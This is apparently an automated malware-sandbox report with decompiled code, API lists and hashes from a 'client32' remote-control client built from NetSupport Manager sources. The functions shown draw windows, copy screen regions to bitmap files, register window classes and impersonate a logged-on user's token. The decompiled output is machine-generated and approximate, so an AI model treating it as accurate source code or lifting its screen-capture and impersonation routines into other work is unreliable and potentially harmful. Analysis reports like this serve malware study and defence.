						_t70 = E11114740(_t106 & 0x0000ffff, _t121, _t133, _a4, _t136, _a8);
						_t141 = _t140 + 0x10;
						L16:
						if(_t70 == 0) {
							L24:
							return _t70;
						}
						_t107 = CreateCompatibleDC( *(_t133 + 0x228));
						if(_t107 == 0) {
							E11029A70("hdc", "..\\ctl32\\Remote.cpp", 0x2fa4);
							_t141 = _t141 + 0xc;
						}
						_t73 = CreateCompatibleBitmap( *(_t133 + 0x228), _v20, _t136);
						_a8 = _t73;
						_t154 = _t73;
						if(_t73 == 0) {
							E11029A70("hbm", "..\\ctl32\\Remote.cpp", 0x2fa6);
							_t141 = _t141 + 0xc;
						}
						_t137 = L11160580(_t154, _t133 + 0x160, _v20, _t136, _v8);
						if(_v8 == 4) {
							 *(_t137 + 0x30) = _t137->bmiColors[0].rgbBlue & 0x0000ffff;
							 *(_t137 + 0x34) =  *(_t137 + 0x2e) & 0x0000ffff;
							_t137->bmiColors[0].rgbBlue =  *(_t137 + 0x30) & 0x0000ffff;
							 *(_t137 + 0x38) =  *(_t137 + 0x36) & 0x0000ffff;
							 *(_t137 + 0x2e) =  *(_t137 + 0x34) & 0x0000ffff;
							 *(_t137 + 0x36) =  *(_t137 + 0x38) & 0x0000ffff;
							 *(_t137 + 0x40) =  *(_t137 + 0x3a) & 0x0000ffff;
							 *(_t137 + 0x3a) =  *(_t137 + 0x40) & 0x0000ffff;
							 *(_t137 + 0x3e) =  *(_t137 + 0x44) & 0x0000ffff;
							 *(_t137 + 0x44) =  *(_t137 + 0x3e) & 0x0000ffff;
						}
						SetDIBits( *(_t133 + 0x22c), _a8, 0, _v12,  *(_t133 + 0x3b0), _t137, 1);
						E11163AA5(_t137);
						E11163AA5( *(_t133 + 0x3b0));
						 *(_t133 + 0x3b0) = 0;
						_a8 = SelectObject(_t107, _a8);
						BitBlt( *(_t133 + 0x22c), 0, _v24, _v20, _v12, _t107, 0, 0, 0xcc0020);
						DeleteObject(SelectObject(_t107, _a8));
						DeleteDC(_t107);
						return L11113FA0(_t133,  &_v28, 0);
					}
					_t70 = _t94 - 4;
					if(_t70 != 0) {
						goto L24;
					}
					_t70 = E11114840(_t136, _t106 & 0x0000ffff, _t109, _t133, _a4);
					L15:
					_t141 = _t140 + 8;
					goto L16;
				}
			}

0x1111c2b0
0x1111c2b0
0x1111c2b9
0x1111c2bb
0x1111c2c4
0x1111c2d3
0x1111c2c6
0x1111c2c6
0x1111c2c6
0x1111c2de
0x1111c2e6
0x1111c2e9
0x1111c2f0
0x1111c2f3
0x1111c34b
0x1111c2f5
0x1111c2f5
0x1111c2fd
0x1111c300
0x1111c305
0x1111c305
0x1111c308
0x1111c311
0x1111c320
0x1111c325
0x1111c328
0x1111c330
0x1111c341
0x1111c346
0x1111c346
0x1111c330
0x1111c351
0x1111c352
0x1111c394
0x00000000
0x1111c354
0x1111c354
0x1111c357
0x1111c380
0x1111c385
0x1111c39c
0x1111c39e
0x1111c50d
0x1111c50d
0x1111c50d
0x1111c3b1
0x1111c3b5
0x1111c3c6
0x1111c3cb
0x1111c3cb
0x1111c3da
0x1111c3e0
0x1111c3e3
0x1111c3e5
0x1111c3f6
0x1111c3fb
0x1111c3fb
0x1111c41a
0x1111c41c
0x1111c42a
0x1111c432
0x1111c43a
0x1111c442
0x1111c44a
0x1111c452
0x1111c45a
0x1111c462
0x1111c466
0x1111c46a
0x1111c46a
0x1111c489
0x1111c490
0x1111c49c
0x1111c4af
0x1111c4d2
0x1111c4dd
0x1111c4eb
0x1111c4f2
0x00000000
0x1111c504
0x1111c359
0x1111c35c
0x00000000
0x00000000
0x1111c36c
0x1111c399
0x1111c399
0x00000000
0x1111c399

APIs

_free.LIBCMT ref: 1111C300
_calloc.LIBCMT ref: 1111C320
CreateCompatibleDC.GDI32(?), ref: 1111C3AB
CreateCompatibleBitmap.GDI32(?,?,?), ref: 1111C3DA
SetDIBits.GDI32(?,00000000,00000000,?,?,00000000,00000001), ref: 1111C489
_free.LIBCMT ref: 1111C490

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

_free.LIBCMT ref: 1111C49C
SelectObject.GDI32 ref: 1111C4B9
BitBlt.GDI32(?,00000000,?,?,?,00000000,00000000,00000000,00CC0020), ref: 1111C4DD
SelectObject.GDI32(00000000,00000000), ref: 1111C4E8
DeleteObject.GDI32(00000000), ref: 1111C4EB
DeleteDC.GDI32(00000000), ref: 1111C4F2

Strings

hdc, xrefs: 1111C3C1
idata->dos_DIB, xrefs: 1111C33C
hbm, xrefs: 1111C3F1
..\ctl32\Remote.cpp, xrefs: 1111C337, 1111C3BC, 1111C3EC

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object_free$CompatibleCreateDeleteSelect$BitmapBitsErrorFreeHeapLast_calloc
String ID: ..\ctl32\Remote.cpp$hbm$hdc$idata->dos_DIB
API String ID: 2365264926-1017213458
Opcode ID: fda340b28dc9344976d7d4f42bbcfcbb12922b7fb03d72ab66ab4dbf3ecdbbb0
Instruction ID: 851ec34c5862c62c2e758830a3d7d1fdd53aad81baf56595c0133d6a7da64e41
Opcode Fuzzy Hash: fda340b28dc9344976d7d4f42bbcfcbb12922b7fb03d72ab66ab4dbf3ecdbbb0
Instruction Fuzzy Hash: 1161BFB9A04616ABD714CFB1DD40BBBF7B8BF48608F004529F9599B684E730FA00C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 11002340 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 162
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E11002340(void* __ecx) {
				int _v8;
				char _v16;
				signed int _v20;
				char _v276;
				struct HBITMAP__* _v280;
				char _v281;
				struct HDC__* _v288;
				void* _v292;
				char* _v320;
				intOrPtr _v328;
				intOrPtr _v336;
				intOrPtr _v348;
				char* _v352;
				intOrPtr _v368;
				intOrPtr _v376;
				struct tagOFNA _v380;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				signed int _t49;
				struct HDC__* _t55;
				char* _t64;
				void* _t74;
				intOrPtr _t75;
				void* _t80;
				int _t82;
				void* _t103;
				int _t105;
				struct HDC__* _t106;
				void* _t108;
				void* _t109;
				signed int _t110;
				void* _t111;
				void* _t112;
				void* _t113;

				_push(0xffffffff);
				_push(0x1117dfcb);
				_push( *[fs:0x0]);
				_t112 = _t111 - 0x16c;
				_t48 =  *0x111ec774; // 0xcbc1010
				_t49 = _t48 ^ _t110;
				_v20 = _t49;
				_push(_t49);
				_t50 =  &_v16;
				 *[fs:0x0] =  &_v16;
				_t108 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x1a0)) != 0) {
					E11001F80( &_v281);
					_t82 =  *((intOrPtr*)(__ecx + 0x1b0)) -  *(__ecx + 0x1a8);
					_t105 =  *((intOrPtr*)(__ecx + 0x1ac)) -  *(__ecx + 0x1a4);
					_v8 = 0;
					_v280 = CreateCompatibleBitmap( *(__ecx + 0x28), _t105, _t82);
					_t55 = CreateCompatibleDC( *(__ecx + 0x28));
					_v288 = _t55;
					_v292 = SelectObject(_t55, _v280);
					_t106 = _v288;
					BitBlt(_t106, 0, 0, _t105, _t82,  *(__ecx + 0x28),  *(__ecx + 0x1a4),  *(__ecx + 0x1a8), 0xcc0020);
					_v276 = 0;
					E11162BE0( &_v380, 0, 0x58);
					_v380 = 0x58;
					_v376 =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0x24)) + 8));
					_v352 =  &_v276;
					_v348 = 0x100;
					_v328 = 0x208c06;
					_v336 = E111457A0(_t82,  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0x24)) + 8)), _t106, 3);
					_v368 = E11146710(0x2f37);
					_t64 = E11081D30(_t63, 0x7c);
					_t113 = _t112 + 0x1c;
					while(_t64 != 0) {
						 *_t64 = 0;
						_t64 = E11081D30(_t64 + 1, 0x7c);
						_t113 = _t113 + 8;
					}
					_v320 = "BMP";
					if(GetSaveFileNameA( &_v380) != 0) {
						_t74 = E110F0E00( &_v380, _v280,  &_v276);
						_t113 = _t113 + 8;
						if(_t74 != 0) {
							if(_t74 == 0xffffffff) {
								_push(0x30);
								_push(0x2f39);
								goto L8;
							}
						} else {
							_push(0x30);
							_push(0x2f38);
							L8:
							_t75 =  *((intOrPtr*)(_t108 + 0x20));
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t75 + 4)) + 4))))(_t75 + 4);
							_t113 = _t113 + 0xc;
						}
					}
					if( *(_t108 + 8) == 0) {
						E11029A70("m_hWnd", "e:\\nsmsrc\\nsm\\1210\\1210f\\ctl32\\wndclass.h", 0x120);
						_t113 = _t113 + 0xc;
					}
					EnableWindow( *(_t108 + 8), 0);
					SelectObject(_t106, _v292);
					_t96 = _v280;
					DeleteObject(_v280);
					DeleteDC(_t106);
					if( *(_t108 + 8) == 0) {
						E11029A70("m_hWnd", "e:\\nsmsrc\\nsm\\1210\\1210f\\ctl32\\wndclass.h", 0x120);
					}
					EnableWindow( *(_t108 + 8), 1);
					_t50 = RevertToSelf();
				}
				 *[fs:0x0] = _v16;
				_pop(_t103);
				_pop(_t109);
				_pop(_t80);
				return E11162BB7(_t50, _t80, _v20 ^ _t110, _t96, _t103, _t109);
			}

0x11002343
0x11002345
0x11002350
0x11002351
0x11002357
0x1100235c
0x1100235e
0x11002364
0x11002365
0x11002368
0x1100236e
0x11002377
0x11002383
0x11002394
0x1100239a
0x110023a6
0x110023b7
0x110023bd
0x110023cb
0x110023e5
0x110023f6
0x11002401
0x11002412
0x11002419
0x11002421
0x11002436
0x1100243c
0x11002442
0x1100244c
0x11002460
0x1100246e
0x11002474
0x11002479
0x1100247e
0x11002480
0x11002487
0x1100248c
0x1100248f
0x1100249a
0x110024ac
0x110024bc
0x110024c1
0x110024c6
0x110024d4
0x110024d6
0x110024d8
0x00000000
0x110024d8
0x110024c8
0x110024c8
0x110024ca
0x110024dd
0x110024dd
0x110024ea
0x110024ec
0x110024ec
0x110024c6
0x110024f3
0x11002504
0x11002509
0x11002509
0x11002518
0x11002522
0x11002528
0x1100252f
0x11002536
0x11002540
0x11002551
0x11002556
0x1100255f
0x11002561
0x11002561
0x1100256a
0x11002572
0x11002573
0x11002574
0x11002582

APIs

Part of subcall function 11001F80: FindWindowA.USER32 ref: 11001FA9
Part of subcall function 11001F80: GetWindowThreadProcessId.USER32(00000000,?), ref: 11001FB7
Part of subcall function 11001F80: OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11001FCB
Part of subcall function 11001F80: GetVersionExA.KERNEL32(?), ref: 11001FE4
Part of subcall function 11001F80: OpenProcessToken.ADVAPI32(00000000,0002000B,00000000), ref: 11002000
Part of subcall function 11001F80: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 11002011
Part of subcall function 11001F80: CloseHandle.KERNEL32(00000000), ref: 11002028
Part of subcall function 11001F80: CloseHandle.KERNEL32(00000000), ref: 1100202F

CreateCompatibleBitmap.GDI32(?,?,?), ref: 110023AD
CreateCompatibleDC.GDI32(?), ref: 110023BD
SelectObject.GDI32(00000000,?), ref: 110023D1
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 11002401
_memset.LIBCMT ref: 11002419

Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB

GetSaveFileNameA.COMDLG32(00000058,?,?,?,0CBC1010), ref: 110024A4
EnableWindow.USER32(00000000,00000000), ref: 11002518
SelectObject.GDI32(?,?), ref: 11002522
DeleteObject.GDI32(?), ref: 1100252F
DeleteDC.GDI32(?), ref: 11002536
EnableWindow.USER32(00000000,00000001), ref: 1100255F
RevertToSelf.ADVAPI32(?,?,?,0CBC1010), ref: 11002561

Strings

m_hWnd, xrefs: 110024FF, 1100254C
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110024FA, 11002547
BMP, xrefs: 1100249A
X, xrefs: 11002421

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$ObjectProcess$CloseCompatibleCreateDeleteEnableFileFolderHandleNameOpenPathSelect$BitmapFindImpersonateLoggedModuleRevertSaveSelfThreadTokenUserVersion_memset
String ID: BMP$X$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 3362589479-2539113696
Opcode ID: 707966891ba89dca208264028aa69297b782c98c3fb71acf7aedca3f39ebb5e9
Instruction ID: 9d3051af6559d4f2dd0c7a1e2ead35f12597f10354149e4796aa47e8d90882b9
Opcode Fuzzy Hash: 707966891ba89dca208264028aa69297b782c98c3fb71acf7aedca3f39ebb5e9
Instruction Fuzzy Hash: 4D51A175E40319AFEB24CF60CC85FEAB7B8FB49748F0045A9E529A7680DB74A940CF51

Uniqueness

Uniqueness Score: -1.00%

Function 110CB450 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 117
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E110CB450() {
				signed int _v8;
				struct _WNDCLASSEXA _v56;
				int _t37;
				signed int _t47;
				signed int _t53;
				struct HINSTANCE__* _t56;
				struct HINSTANCE__* _t57;
				struct HINSTANCE__* _t63;
				struct HINSTANCE__* _t64;
				int _t66;

				EnterCriticalSection(0x111f3420);
				 *0x111ee494 = RegisterClipboardFormatA("WM_ATLGETHOST");
				_t37 = RegisterClipboardFormatA("WM_ATLGETCONTROL");
				_t56 =  *0x111f33e8; // 0x11000000
				 *0x111ee498 = _t37;
				_v56.cbSize = 0x30;
				if(GetClassInfoExA(_t56, "AtlAxWin100",  &_v56) != 0) {
					L3:
					E11162BE0( &_v56, 0, 0x30);
					_t57 =  *0x111f33e8; // 0x11000000
					_v56.cbSize = 0x30;
					_t66 = GetClassInfoExA(_t57, "AtlAxWinLic100",  &_v56);
					if(_t66 != 0) {
						goto L7;
					} else {
						_t63 =  *0x111f33e8; // 0x11000000
						_v56.cbSize = 0x30;
						_v56.style = 8;
						_v56.lpfnWndProc =  &M110CB100;
						_v56.cbClsExtra = 0;
						_v56.cbWndExtra = 0;
						_v56.hInstance = _t63;
						_v56.hIcon = 0;
						_v56.hCursor = LoadCursorA(0, 0x7f00);
						_v56.hbrBackground = 6;
						_v56.lpszMenuName = 0;
						_v56.lpszClassName = "AtlAxWinLic100";
						_v56.hIconSm = 0;
						_t47 = RegisterClassExA( &_v56) & 0x0000ffff;
						_v8 = _t47;
						if(_t47 == 0) {
							goto L6;
						} else {
							E110C2C00(0x111f343c,  &_v8);
							LeaveCriticalSection(0x111f3420);
							return 1;
						}
					}
				} else {
					_t64 =  *0x111f33e8; // 0x11000000
					_v56.cbSize = 0x30;
					_v56.style = 8;
					_v56.lpfnWndProc =  &M110CADF0;
					_v56.cbClsExtra = 0;
					_v56.cbWndExtra = 0;
					_v56.hInstance = _t64;
					_v56.hIcon = 0;
					_v56.hCursor = LoadCursorA(0, 0x7f00);
					_v56.hbrBackground = 6;
					_v56.lpszMenuName = 0;
					_v56.lpszClassName = "AtlAxWin100";
					_v56.hIconSm = 0;
					_t53 = RegisterClassExA( &_v56) & 0x0000ffff;
					_v8 = _t53;
					if(_t53 == 0) {
						L6:
						_t66 = 0;
						L7:
						LeaveCriticalSection(0x111f3420);
						return _t66;
					} else {
						E110C2C00(0x111f343c,  &_v8);
						goto L3;
					}
				}
			}

0x110cb45e
0x110cb476
0x110cb47b
0x110cb47d
0x110cb489
0x110cb49d
0x110cb4a6
0x110cb515
0x110cb51b
0x110cb520
0x110cb533
0x110cb538
0x110cb53c
0x00000000
0x110cb542
0x110cb542
0x110cb54e
0x110cb551
0x110cb558
0x110cb55f
0x110cb562
0x110cb565
0x110cb568
0x110cb571
0x110cb578
0x110cb57f
0x110cb582
0x110cb589
0x110cb592
0x110cb595
0x110cb59b
0x00000000
0x110cb59d
0x110cb5a6
0x110cb5b5
0x110cb5c3
0x110cb5c3
0x110cb59b
0x110cb4a8
0x110cb4a8
0x110cb4b4
0x110cb4b7
0x110cb4be
0x110cb4c5
0x110cb4c8
0x110cb4cb
0x110cb4ce
0x110cb4d7
0x110cb4de
0x110cb4e5
0x110cb4e8
0x110cb4ef
0x110cb4f8
0x110cb4fb
0x110cb501
0x110cb5c4
0x110cb5c4
0x110cb5c6
0x110cb5cb
0x110cb5d9
0x110cb507
0x110cb510
0x00000000
0x110cb510
0x110cb501

APIs

EnterCriticalSection.KERNEL32(111F3420,?,00000000,00000000,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB45E
RegisterClipboardFormatA.USER32 ref: 110CB46F
RegisterClipboardFormatA.USER32 ref: 110CB47B
GetClassInfoExA.USER32(11000000,AtlAxWin100,?), ref: 110CB4A0
LoadCursorA.USER32 ref: 110CB4D1
RegisterClassExA.USER32(?), ref: 110CB4F2
_memset.LIBCMT ref: 110CB51B
GetClassInfoExA.USER32(11000000,AtlAxWinLic100,?), ref: 110CB536
LoadCursorA.USER32 ref: 110CB56B
RegisterClassExA.USER32(?), ref: 110CB58C
LeaveCriticalSection.KERNEL32(111F3420,0000000E), ref: 110CB5B5
LeaveCriticalSection.KERNEL32(111F3420,?,?,?,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB5CB

Part of subcall function 110C2C00: __recalloc.LIBCMT ref: 110C2C48

Strings

WM_ATLGETCONTROL, xrefs: 110CB471
AtlAxWinLic100, xrefs: 110CB52D, 110CB582
WM_ATLGETHOST, xrefs: 110CB46A
AtlAxWin100, xrefs: 110CB492, 110CB4E8

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ClassRegister$CriticalSection$ClipboardCursorFormatInfoLeaveLoad$Enter__recalloc_memset
String ID: AtlAxWin100$AtlAxWinLic100$WM_ATLGETCONTROL$WM_ATLGETHOST
API String ID: 2220097787-1587594278
Opcode ID: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
Instruction ID: 380367346e18165f725bae6bc82d4f79de56b371e9301c8febdab5dbf058e0d0
Opcode Fuzzy Hash: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
Instruction Fuzzy Hash: 854179B5D02229ABCB01DFD9E984AEEFFB9FB48714F50406AE415B3200DB351A44CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 11003650 Relevance: 27.2, APIs: 18, Instructions: 171
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E11003650(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				struct tagRECT _v24;
				struct HBRUSH__* _v28;
				void* _v32;
				void* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t52;
				long _t96;
				intOrPtr _t125;
				signed int _t126;
				void* _t127;
				void* _t128;

				_t52 =  *0x111ec774; // 0xcbc1010
				_v8 = _t52 ^ _t126;
				_t125 = _a4;
				_t96 = E11003200( *((intOrPtr*)(_t125 + 8)));
				_v24.left =  *(_t125 + 0x1c);
				_v24.top =  *((intOrPtr*)(_t125 + 0x20));
				_v24.right =  *((intOrPtr*)(_t125 + 0x24));
				_v24.bottom =  *((intOrPtr*)(_t125 + 0x28));
				E111430E0( *(_t125 + 0x18),  &_v24, GetSysColor(4));
				_t128 = _t127 + 0xc;
				_v28 = CreateSolidBrush(_t96);
				_v36 = SelectObject( *(_t125 + 0x18), GetStockObject(7));
				_v32 = SelectObject( *(_t125 + 0x18), _v28);
				if(_t96 == _a8) {
					E11143120( *(_t125 + 0x18),  &_v24, 0, GetSysColor(0x10));
					E11143120( *(_t125 + 0x18),  &_v24, 1, GetSysColor(0x10));
					E11143120( *(_t125 + 0x18),  &_v24, 2, GetSysColor(0x14));
					E11143120( *(_t125 + 0x18),  &_v24, 3, GetSysColor(0x14));
					_t128 = _t128 + 0x40;
				}
				if(( *(_t125 + 0x10) & 0x00000001) != 0) {
					E11143120( *(_t125 + 0x18),  &_v24, 0, GetSysColor(0x14));
					E11143120( *(_t125 + 0x18),  &_v24, 1, GetSysColor(0x14));
					E11143120( *(_t125 + 0x18),  &_v24, 2, GetSysColor(0x10));
					E11143120( *(_t125 + 0x18),  &_v24, 3, GetSysColor(0x10));
				}
				InflateRect( &_v24, 0xfffffffe, 0xfffffffe);
				Rectangle( *(_t125 + 0x18), _v24, _v24.top, _v24.right, _v24.bottom);
				SelectObject( *(_t125 + 0x18), _v32);
				SelectObject( *(_t125 + 0x18), _v36);
				return E11162BB7(DeleteObject(_v28), _t96, _v8 ^ _t126,  *(_t125 + 0x18), SelectObject, _t125);
			}

0x11003656
0x1100365d
0x11003662
0x1100367b
0x11003680
0x11003688
0x1100368b
0x1100368e
0x1100369c
0x110036a1
0x110036ad
0x110036c4
0x110036d2
0x110036d8
0x110036e9
0x11003700
0x11003717
0x1100372e
0x11003733
0x11003733
0x1100373a
0x1100374b
0x11003762
0x11003779
0x11003790
0x11003795
0x110037a0
0x110037ba
0x110037ce
0x110037d8
0x110037f4

APIs

GetSysColor.USER32(00000004), ref: 11003691

Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111

CreateSolidBrush.GDI32(00000000), ref: 110036A5
GetStockObject.GDI32(00000007), ref: 110036B0
SelectObject.GDI32(?,00000000), ref: 110036BB
SelectObject.GDI32(?,?), ref: 110036CC
GetSysColor.USER32(00000010), ref: 110036DC
GetSysColor.USER32(00000010), ref: 110036F3
GetSysColor.USER32(00000014), ref: 1100370A
GetSysColor.USER32(00000014), ref: 11003721
GetSysColor.USER32(00000014), ref: 1100373E
GetSysColor.USER32(00000014), ref: 11003755
GetSysColor.USER32(00000010), ref: 1100376C
GetSysColor.USER32(00000010), ref: 11003783
InflateRect.USER32(?,000000FE,000000FE), ref: 110037A0
Rectangle.GDI32(?,?,00000001,?,?), ref: 110037BA
SelectObject.GDI32(?,?), ref: 110037CE
SelectObject.GDI32(?,?), ref: 110037D8
DeleteObject.GDI32(?), ref: 110037DE

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Color$Object$Select$BrushCreateDeleteInflateRectRectangleSolidStockText
String ID:
API String ID: 3698065672-0
Opcode ID: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
Instruction ID: a23acd2a2556d2351ec77cf4709ac6c6322e0be3c302c098e9beaf4924cedc1a
Opcode Fuzzy Hash: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
Instruction Fuzzy Hash: 78515EB5900309AFE714DFA5CC85EBBF3BDEF98704F104A18E611A7691D670B944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 110711C0 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 285COMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

_malloc.LIBCMT ref: 11071282

Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56

_free.LIBCMT ref: 110712A7

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
